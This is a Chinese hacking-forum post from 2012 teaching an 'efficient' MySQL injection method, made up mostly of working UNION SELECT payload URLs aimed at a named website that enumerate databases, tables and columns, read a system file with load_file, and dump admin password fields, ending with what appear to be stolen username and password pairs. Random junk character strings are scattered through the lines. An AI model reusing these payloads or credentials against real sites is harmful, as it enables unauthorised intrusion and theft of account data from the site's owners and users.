找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 mysql注入高效方法
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2025|回复: 0
打印 上一主题 下一主题

mysql注入高效方法

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 16:37:34 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似
9 O4 J  s  r' p9 y) v: T2 a但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人
3 t* R! C; Z6 B( m  o" x7 R) e& R% H% _5 C/ m, P' K  q

; E! m- f0 R$ B1 E# M1 J优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入
8 a+ Z5 E+ j% p" [1 j
3 {4 f: A" g! @/ N+ |- ^缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...
1 M/ g! p1 O! U% i
6 W; \2 G$ s7 J: C9 w) l' f/ K5 b  @下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示, s) s) v3 N' y+ v. J& a
在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ ,  + 等等* J% p9 B, g* N

2 a  t9 d% N4 q8 l! Q8 D2 |+ S. phttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17) X( a% g$ m. k. Z
  @+ ]+ Z- H4 k8 e* s- K
读出所有库:: D/ n! I" `$ X8 A, n+ E
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA
/ E! `) B  v6 m- Z( f, O: y% u( `, v6 q+ I
0 N) V/ h2 T5 _, z$ p
- O" v' N( b: S7 F% k; Q! z
读出所有表:, |9 h5 _  |5 v
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()
4 `; `8 p6 U. a8 P: u! E
$ O) k+ |4 r# c; L3 d' G- ]% p. M读出所有表字段:
# U8 O( L8 N: l% n# I3 N" z4 V- Qhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)
8 o9 Z" }7 c7 D1 }( ~*/ (97,100,109,105,110)为admin的ascii码 依次类推& i3 l  o  A* W7 u! M- x
5 w* K) Z9 K' p8 g: V
读出所有表字段里的内容:
  ~6 l: |) C; Zhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin( e; n. q: _5 c( K
9 N8 n7 p2 P9 ?
2 u8 K- ?; n+ W5 @

8 M5 _6 @9 ?$ u" c* S$ u& f5 ]& J, U" ]. M, C7 r! f% }
* e. G/ ^3 u  v; c' ~. a
0 K- W6 C1 r, _
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23
8 w" J7 ^& _" H* O
% }7 m+ c& Y: J0 Y0 d
' [( O( X, |. T  B8 X) F, d9 y( c, Thttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%233 o/ R$ V; h$ W) `( I; j
% E9 t6 r, K& A$ S. L
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%237 o* M% h$ p; H8 f
) F1 G( M/ ]8 H$ ~* c/ y
8 I; r" @, i/ I; H& `* V
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23
, M+ \: |1 j2 z# w' B( A3 J; K7 i' Y! s( M2 w
8 A3 a  f7 c0 J0 v+ f) c3 O" A8 c7 N
        webmaster:dzb521123,simlab:simadmin20043233
8 x  X) V; O. \# Y, [
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表